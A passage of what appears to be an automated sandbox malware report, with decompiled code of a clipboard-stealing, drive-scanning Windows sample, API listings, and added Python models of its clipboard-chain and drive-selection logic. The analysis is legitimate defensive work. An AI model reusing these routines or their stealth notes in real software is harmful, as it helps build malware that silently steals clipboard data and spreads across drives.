                                _t129 = _t129 + 8;
                                _v16 = _t98;
                            }
                        }
                    }
                    GlobalUnlock(_v24);
                    CloseClipboard();
                    if(_v16 != 0) {
                        E00403480(_v16);                  /* consumer of the copied clipboard text (not in this section) */
                        E00408FB0(_v16);                  /* second call on the same buffer, after the consumer (not in this section) */
                    }
                    goto L34;
                }
                goto L38;   /* GlobalLock failed: as decompiled, the clipboard stays open and nothing is forwarded */
            }
        }
        goto L38;           /* reached after L34, and when GetClipboardData failed (then the clipboard is likewise left open) */
    }
    if(_v40 == 1) {                               /* WM_CREATE: join the clipboard viewer chain */
        _v8 = SetClipboardViewer(_a4);            /* returns the previous head, which becomes our successor */
        SetWindowLongW(_a4, 0xffffffeb, _v8);
    } else {
        if(_v40 == 2) {                           /* WM_DESTROY: leave the chain and drop the raw keyboard registration */
            _v36 = 0;
            _v34 = 0;
            _v30 = 0;
            _v26 = 0;
            _v36 = 1;                             /* usUsagePage 1: generic desktop controls */
            _v34 = 6;                             /* usUsage 6: keyboard */
            _v32 = 1;                             /* dwFlags 1: RIDEV_REMOVE; hwndTarget stays NULL */
            __imp__RegisterRawInputDevices( &_v36, 1, 0xc);   /* one RAWINPUTDEVICE, cbSize 0xc */
            ChangeClipboardChain(_a4, _v8);       /* unlink; the rest of the chain learns of it via WM_CHANGECBCHAIN */
        }
    }
    goto L38;
}

                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DBC
                                                                                  • SetClipboardViewer.USER32(?), ref: 00403E08
                                                                                  • SetWindowLongW.USER32 ref: 00403E1B
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00403E70
                                                                                  • OpenClipboard.USER32(00000000), ref: 00403EB7
                                                                                  • GetClipboardData.USER32 ref: 00403EC9
                                                                                  • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00403FD0
                                                                                  • ChangeClipboardChain.USER32(?,?), ref: 00403FDE
                                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 00403FF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                  • String ID:
                                                                                  • API String ID: 3549449529-0
                                                                                  • Opcode ID: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction ID: 0016380ad0389118889d1cf690c65c1d7a98e8f3a274b3db5f7ad41e70fd50c0
                                                                                  • Opcode Fuzzy Hash: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction Fuzzy Hash: B3713D75D00209EFDB14DFA4D848BEEBBB8BF48306F14852AF505B6290D7799B40CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
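The handler above is a textbook clipboard-viewer chain member: it links in on WM_CREATE, re-links on WM_CHANGECBCHAIN, forwards every WM_DRAWCLIPBOARD it acts on, and unlinks on WM_DESTROY, so applications further down the chain keep receiving clipboard notifications while the sample reads the text. The following Python model, added here as an example and not code from the sample or from the report, replays that protocol with constructed integer window handles and a small stand-in for user32; the Viewer branches mirror the decompiled handler message by message (the failure paths that skip L34 are not modelled). Running it shows the chain surviving the removal of a middle viewer and the format preference order deciding when text is captured.

```python
"""Model of the Win32 clipboard viewer chain as driven by E00403DB0.
Added example; window handles are constructed integers, Desktop stands in
for the user32 calls, and nothing touches a real clipboard."""

WM_CREATE, WM_DESTROY = 0x0001, 0x0002
WM_DRAWCLIPBOARD, WM_CHANGECBCHAIN = 0x0308, 0x030D
CF_TEXT, CF_OEMTEXT, CF_UNICODETEXT = 1, 7, 13


def pick_format(available):
    """Same preference order as the three IsClipboardFormatAvailable calls; 0 means no text."""
    for fmt in (CF_UNICODETEXT, CF_TEXT, CF_OEMTEXT):
        if fmt in available:
            return fmt
    return 0


class Desktop:
    """Stand-in for user32: owns the chain head, the clipboard, and message delivery."""

    def __init__(self):
        self.head = 0          # HWND of the first viewer, 0 when the chain is empty
        self.windows = {}      # hwnd -> Viewer
        self.formats, self.data = set(), None

    def set_clipboard_viewer(self, hwnd):
        prev, self.head = self.head, hwnd
        return prev            # the caller must forward chain messages to this window

    def change_clipboard_chain(self, hwnd, hwnd_next):
        if self.head == hwnd:
            self.head = hwnd_next
        elif self.head:
            self.send(self.head, WM_CHANGECBCHAIN, hwnd, hwnd_next)

    def send(self, hwnd, msg, wparam, lparam):
        self.windows[hwnd].wndproc(msg, wparam, lparam)

    def set_clipboard(self, formats, data):
        self.formats, self.data = set(formats), data
        if self.head:
            self.send(self.head, WM_DRAWCLIPBOARD, 0, 0)


class Viewer:
    """One window whose wndproc follows the four branches of E00403DB0."""

    def __init__(self, desktop, hwnd, name, log):
        self.d, self.hwnd, self.name, self.log = desktop, hwnd, name, log
        self.next = 0          # what the sample stores in GWL_USERDATA
        desktop.windows[hwnd] = self
        self.wndproc(WM_CREATE, 0, 0)

    def wndproc(self, msg, wparam, lparam):
        if msg == WM_CREATE:                     # SetClipboardViewer + SetWindowLongW
            self.next = self.d.set_clipboard_viewer(self.hwnd)
        elif msg == WM_DESTROY:                  # ChangeClipboardChain
            self.d.change_clipboard_chain(self.hwnd, self.next)
        elif msg == WM_CHANGECBCHAIN:
            if wparam == self.next:              # our successor is leaving: adopt its successor
                self.next = lparam
            elif self.next:                      # otherwise pass the message down the chain
                self.d.send(self.next, msg, wparam, lparam)
        elif msg == WM_DRAWCLIPBOARD:
            if pick_format(self.d.formats):      # text present: this is where E00403480 gets a copy
                self.log.append((self.name, self.d.data))
            if self.next:                        # forwarded on every path that reaches L34
                self.d.send(self.next, msg, wparam, lparam)


def run_scenario():
    """Three viewers; the middle one is destroyed. Returns the capture log and
    the head viewer's successor after the unlink."""
    d, log = Desktop(), []
    Viewer(d, 0x1001, "a", log)
    b = Viewer(d, 0x1002, "b", log)
    c = Viewer(d, 0x1003, "c", log)             # chain is now c -> b -> a
    d.set_clipboard({CF_UNICODETEXT}, "first")
    b.wndproc(WM_DESTROY, 0, 0)                 # c must relink straight to a
    d.set_clipboard({CF_TEXT}, "second")
    d.set_clipboard({8}, b"bitmap")             # CF_DIB only: no text format, nothing captured
    return log, c.next


if __name__ == "__main__":
    print(run_scenario())
```

The scenario is the one an analyst cares about when deciding whether a clipper is likely to be noticed: because the sample replies to WM_CHANGECBCHAIN and forwards WM_DRAWCLIPBOARD, tearing down or adding other viewers leaves the chain consistent and the capture continues.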

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 50%
E004050B0() {
    /* Thread body: every two seconds rescans drive letters C: through Z: and hands each
       removable or network volume to E00404BD0. The helpers E0040D530, E004048C0,
       E00404860, E00404BD0 and L0040F1B0 are not in this section; comments on them
       describe only what their call sites imply. */
    intOrPtr _v8;              /* result of E004048C0, passed to every E00404860 call */
    intOrPtr _v12;             /* drive index, 2..0x19 */
    intOrPtr _v16;             /* value returned by E00404860, compared with 2 and 4 */
    short _v24;                /* drive root path filled in by E00404860 */
    short _v556;               /* " (%dGB)" size suffix */
    short _v2604;              /* "<label><suffix>" display name */
    intOrPtr _v2608;           /* high dword of _v2612 */
    union _ULARGE_INTEGER _v2612;   /* total bytes from GetDiskFreeSpaceExW */
    long _v2616;               /* file system flags from GetVolumeInformationW */
    short _v3148;              /* volume label, 0x105 characters */
    intOrPtr _v3152;
    intOrPtr _t34;
    intOrPtr _t38;
    struct %anon54 _t43;
    intOrPtr _t63;
    void* _t68;
    void* _t69;
    void* _t70;

    Sleep(0x3e8);                                  /* 1000 ms */
    GetModuleFileNameW(0, 0x414418, 0x104);        /* own executable path into the global buffer at 0x414418 (MAX_PATH) */
    _t34 = E0040D530(0x414418);
    _t69 = _t68 + 4;
     *0x414410 = _t34;                             /* value derived from that path, kept in a global */
    while(1 != 0) {                                /* never exits normally */
        _v8 = E004048C0();
        _v12 = 2;
        while(_v12 <= 0x19) {                      /* drive index 2..25, i.e. C: through Z: */
            _t38 = E00404860(_v8, _v12,  &_v24);   /* fills _v24 with the root path and returns a type code */
            _t69 = _t69 + 0xc;
            _v16 = _t38;
            _v3152 = _v16;
            if(_v3152 == 2 || _v3152 == 4) {       /* the two values match DRIVE_REMOVABLE (2) and DRIVE_REMOTE (4) */
                GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);   /* label and file system flags */
                GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);                           /* total size in bytes */
                _push(0);
                _push(0x40000000);                 /* 64-bit divisor 0x40000000 (1 GiB) ... */
                _t63 = _v2608;
                _push(_t63);
                _t43 = _v2612.LowPart;
                _push(_t43);
                L0040F1B0();                       /* ... and 64-bit dividend: the calling pattern of the CRT 64-bit divide, giving whole GiB */
                _push(_t63);
                wsprintfW( &_v556, L" (%dGB)", _t43);
                _t70 = _t69 + 0x10;
                if((_v3148 & 0x0000ffff) == 0) {   /* empty label */
                    wsprintfW( &_v3148, L"Unnamed volume");
                    _t70 = _t70 + 8;
                }
                wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);    /* "<label> (<n>GB)" */
                /* root path, display name, file system flags, and a byte that is 1 only for type 4 (network drive) */
                E00404BD0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                _t69 = _t70 + 0x20;
            }
            _v12 = _v12 + 1;
        }
        Sleep(0x7d0);                              /* 2000 ms between passes */
    }
    ExitThread(0);
}
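To predict which volumes on a given host this thread would pass to E00404BD0, it helps to have the selection logic in a form that can be run against a drive table. The Python below is an added example, not code from the sample or from the report. Because the report shows only the call sites, two things are assumptions and are labelled as such in the code: that E004048C0 returns a GetLogicalDrives-style bitmask and that E00404860 builds "X:\" from the index and returns a GetDriveType value. The drive tables are constructed test data.

```python
"""Model of the drive-scanning loop of E004050B0. Added example; helper
behaviour marked 'assumed' is inferred from call sites only."""

DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_REMOTE, DRIVE_CDROM = 2, 3, 4, 5
GIB = 0x40000000                      # divisor pushed before the L0040F1B0 call
FIRST_INDEX, LAST_INDEX = 2, 0x19     # loop bounds in the decompiled code


def drive_root(index):
    """Index 2..25 -> 'C:\\' .. 'Z:\\' (assumed behaviour of E00404860)."""
    return chr(ord("A") + index) + ":\\"


def display_name(label, total_bytes):
    """The three wsprintfW calls: '<label> (<n>GB)', label defaulting to 'Unnamed volume'.
    The size is an integer division by 1 GiB, so a 16 GiB - 1 byte stick prints as 15GB."""
    return (label or "Unnamed volume") + " (%dGB)" % (total_bytes // GIB)


def scan_once(drive_mask, drive_types, volumes):
    """One pass of the inner loop. Returns what would reach E00404BD0 for each
    selected drive: (root, display_name, fs_flags, is_network)."""
    targets = []
    for index in range(FIRST_INDEX, LAST_INDEX + 1):
        if not drive_mask & (1 << index):         # letter not present (assumed mask check)
            continue
        root = drive_root(index)
        dtype = drive_types.get(root, 0)
        if dtype not in (DRIVE_REMOVABLE, DRIVE_REMOTE):   # fixed disks and CD-ROMs are skipped
            continue
        label, total_bytes, fs_flags = volumes[root]
        targets.append((root, display_name(label, total_bytes), fs_flags, dtype == DRIVE_REMOTE))
    return targets


# Constructed host: C: fixed disk, D: USB stick with no label, E: CD-ROM, Z: mapped share.
SAMPLE_MASK = (1 << 2) | (1 << 3) | (1 << 4) | (1 << 25)
SAMPLE_TYPES = {"C:\\": DRIVE_FIXED, "D:\\": DRIVE_REMOVABLE,
                "E:\\": DRIVE_CDROM, "Z:\\": DRIVE_REMOTE}
FILE_CASE_PRESERVED_NAMES = 0x2          # one GetVolumeInformation flag, used as sample fs_flags
SAMPLE_VOLUMES = {"C:\\": ("OS", 512 * GIB, FILE_CASE_PRESERVED_NAMES),
                  "D:\\": ("", 16 * GIB - 1, FILE_CASE_PRESERVED_NAMES),
                  "E:\\": ("DVD", 4 * GIB, 0),
                  "Z:\\": ("SHARE", 2048 * GIB, FILE_CASE_PRESERVED_NAMES)}

if __name__ == "__main__":
    for target in scan_once(SAMPLE_MASK, SAMPLE_TYPES, SAMPLE_VOLUMES):
        print(target)
```

On the constructed host only D: and Z: are selected; the network flag passed as the last argument is what separates the two cases for E00404BD0, and the loop repeats every two seconds, so a stick plugged in later is picked up on the next pass.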






















                                                                                  APIs
                                                                                  • Sleep.KERNEL32(000003E8), ref: 004050BE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00414418,00000104), ref: 004050D0
                                                                                    • Part of subcall function 0040D530: CreateFileW.KERNEL32(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                    • Part of subcall function 0040D530: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                    • Part of subcall function 0040D530: CloseHandle.KERNEL32(000000FF), ref: 0040D572
                                                                                  • ExitThread.KERNEL32 ref: 0040523A
                                                                                    • Part of subcall function 004048C0: GetLogicalDrives.KERNEL32 ref: 004048C6
                                                                                    • Part of subcall function 004048C0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                    • Part of subcall function 004048C0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                    • Part of subcall function 004048C0: RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040522D
                                                                                    • Part of subcall function 00404860: lstrcpyW.KERNEL32 ref: 004048B3
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040516F
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00405184
                                                                                  • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040519F
                                                                                  • wsprintfW.USER32 ref: 004051B2
                                                                                  • wsprintfW.USER32 ref: 004051D2
                                                                                  • wsprintfW.USER32 ref: 004051F5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                  • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                  • API String ID: 1650488544-2117135753
                                                                                  • Opcode ID: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction ID: a985ed85a03a777e582de5830084f45234a9f7b72307fd88a6662299d951ba90
                                                                                  • Opcode Fuzzy Hash: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction Fuzzy Hash: 67418371D00214ABE754DB94DC45FEE7778EB48704F1085AAF209B51D0DA785B88CF6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 45%
                                                                                  			void* E0040EEA0(void* __esi) {
                                                                                  				struct _SYSTEM_INFO _v36;
                                                                                  				short _v40;
                                                                                  				char _v77;
                                                                                  				short _v82;
                                                                                  				short _v86;
                                                                                  				short _v90;
                                                                                  				short _v92;
                                                                                  				short _v94;
                                                                                  				short _v96;
                                                                                  				short _v98;
                                                                                  				char _v100;
                                                                                  				void* __edi;
                                                                                  				intOrPtr* _t30;
                                                                                  				void* _t33;
                                                                                  				void* _t36;
                                                                                  				intOrPtr _t37;
                                                                                  				short _t39;
                                                                                  				intOrPtr _t40;
                                                                                  				intOrPtr* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t58;
                                                                                  				void* _t59;
                                                                                  				intOrPtr _t45; /* processor count read from _v36; declaration missing in the decompiler output */
                                                                                  
                                                                                  				_t30 = E00408E40(0x4c);
                                                                                  				_t54 = _t30;
                                                                                  				_t59 = _t58 + 4;
                                                                                  				if(_t54 == 0) {
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					 *_t54 = 0x494f4350;
                                                                                  					GetSystemInfo( &_v36);
                                                                                  					_t45 = _v36.dwNumberOfProcessors;
                                                                                  					_t3 = _t54 + 0x20; // 0x20
                                                                                  					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                  					InitializeCriticalSection(_t3);
                                                                                  					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t54 + 0x10) = _t33;
                                                                                  					if(_t33 == 0) {
                                                                                  						L12:
                                                                                  						E0040E480(_t54);
                                                                                  						return 0;
                                                                                  					}
                                                                                  					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                  					 *(_t54 + 8) = _t36;
                                                                                  					if(_t36 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t37 = E0040BEA0(_t45);
                                                                                  					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                  					if(_t37 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSASocketA(2, 1, 6, 0, 0, 1);
                                                                                  					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                  					if(_t37 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_v77 = 1;
                                                                                  					__imp__#21(_t37, 0xffff, 4,  &_v77, 1);
                                                                                  					_v94 = 0;
                                                                                  					_v90 = 0;
                                                                                  					_v86 = 0;
                                                                                  					_v82 = 0;
                                                                                  					_t39 = _v40;
                                                                                  					_v96 = 2;
                                                                                  					_v92 = _t39;
                                                                                  					__imp__#9(_v36.dwOemId);
                                                                                  					_v98 = _t39;
                                                                                  					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                  					__imp__#2(_t40,  &_v100, 0x10);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSACreateEvent();
                                                                                  					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                  					if(_t40 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t56 = 0;
                                                                                  					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                  						do {
                                                                                  							E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040EDD0, _t54, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  							_t59 = _t59 + 0x18;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                  					}
                                                                                  					E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E7A0, _t54, 0, 0);
                                                                                  					return _t54;
                                                                                  				}
                                                                                  			}
                                                                                  Instruction addresses of the decompiled lines above (address column of the listing, one entry per source line, in order; 0x00000000 marks lines without a code address):
                                                                                  0x0040eea6 0x0040eeab 0x0040eead 0x0040eeb2 0x0040f02a 0x0040eeb8 0x0040eebd 0x0040eec3 0x0040eec9 0x0040eecd 0x0040eed4 0x0040eed7 0x0040eee5 0x0040eeeb 0x0040eef0 0x0040f01f 0x0040f01f 0x00000000 0x0040f024 0x0040eefe 0x0040ef04 0x0040ef09 0x00000000 0x00000000 0x0040ef0f 0x0040ef14 0x0040ef19 0x00000000 0x00000000 0x0040ef2b 0x0040ef31 0x0040ef37 0x00000000 0x00000000 0x0040ef4c 0x0040ef51 0x0040ef5d 0x0040ef61 0x0040ef65 0x0040ef69 0x0040ef6e 0x0040ef78 0x0040ef7d 0x0040ef81 0x0040ef8d 0x0040ef92 0x0040ef97 0x0040efa0 0x00000000 0x00000000 0x0040efaf 0x0040efb8 0x00000000 0x00000000 0x0040efba 0x0040efc0 0x0040efc5 0x00000000 0x00000000 0x0040efce 0x0040efd7 0x00000000 0x00000000 0x0040efda 0x0040efdf 0x0040efe1 0x0040eff1 0x0040eff6 0x0040eff7 0x0040effa 0x0040efe1 0x0040f00f 0x0040f01e 0x0040f01e

                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?), ref: 0040EEC3
                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 0040EED7
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040EEE5
                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EEFE
                                                                                    • Part of subcall function 0040BEA0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040BEBE
                                                                                  • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040EF2B
                                                                                  • setsockopt.WS2_32 ref: 0040EF51
                                                                                  • htons.WS2_32(?), ref: 0040EF81
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040EF97
                                                                                  • listen.WS2_32(?,7FFFFFFF), ref: 0040EFAF
                                                                                  • WSACreateEvent.WS2_32 ref: 0040EFBA
                                                                                  • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040EFCE
                                                                                    • Part of subcall function 0040BF50: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BF50: CreateThread.KERNEL32 ref: 0040BFCF
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                    • Part of subcall function 0040BF50: DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                    • Part of subcall function 0040BF50: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 1603358586-0
                                                                                  • Opcode ID: 3a48ff714123f67728488ebd241aa5cbce844eebc6b7f1e346220b8f1150fb3f
                                                                                  • Instruction ID: 70d9824073996a0ff4c6e74931008e54e86ddc456e6e2338b5ab093a1f0703e2
                                                                                  • Opcode Fuzzy Hash: 3a48ff714123f67728488ebd241aa5cbce844eebc6b7f1e346220b8f1150fb3f
                                                                                  • Instruction Fuzzy Hash: DD41A470240702BFD3209F64DC4AF5AB7A5BF88710F108A3AF668E66D1D7B4E454C799
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                  • htons.WS2_32(0000076C), ref: 0040C980
                                                                                  • inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                  • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 00409880: htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409880: socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                    • Part of subcall function 00409880: connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                    • Part of subcall function 00409880: getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  • bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                  • lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                  • sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                  • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040C840: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                    • Part of subcall function 0040C840: Sleep.KERNEL32(000003E8), ref: 0040C89E
                                                                                    • Part of subcall function 0040C840: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                    • Part of subcall function 0040C840: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                    • Part of subcall function 0040C840: StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                  • String ID: 239.255.255.250
                                                                                  • API String ID: 726339449-2186272203
                                                                                  • Opcode ID: f43b03ae6e4f538bd75ce9ea370b17764c9772fec20ce54065493977abab1f4b
                                                                                  • Instruction ID: b865f0e7113cd30ffca57b294248847536cf2bc14de9108ff1861f92315d7120
                                                                                  • Opcode Fuzzy Hash: f43b03ae6e4f538bd75ce9ea370b17764c9772fec20ce54065493977abab1f4b
                                                                                  • Instruction Fuzzy Hash: D241F8B4E10209EFDB04DFE4D889BEEBBB5EF48304F108169E905B7290D7B55A44CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040C840(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                  				char _v1028;
                                                                                  				char _v1029;
                                                                                  				intOrPtr _v1036;
                                                                                  				char* _v1040;
                                                                                  				char* _v1044;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t29;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				_t20 = __eax;
                                                                                  				_v1029 = 0;
                                                                                  				_v1036 = 0;
                                                                                  				while(_v1036 < 2) {
                                                                                  					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0);
                                                                                  					if(_t20 != 0xffffffff) {
                                                                                  						_v1029 = 1;
                                                                                  						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                  							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                  							if(_v1040 != 0) {
                                                                                  								_v1044 = _v1040 + 0xa;
                                                                                  								_t29 = E0040B640(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                  								_t37 = _t37 + 8;
                                                                                  								 *_a8 = _t29;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						Sleep(0x3e8);
                                                                                  					}
                                                                                  					_t20 = _v1036 + 1;
                                                                                  					_v1036 = _t20;
                                                                                  				}
                                                                                  				return _v1029;
                                                                                  			}

                                                                                  APIs
                                                                                  • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040C89E
                                                                                  • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                  • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
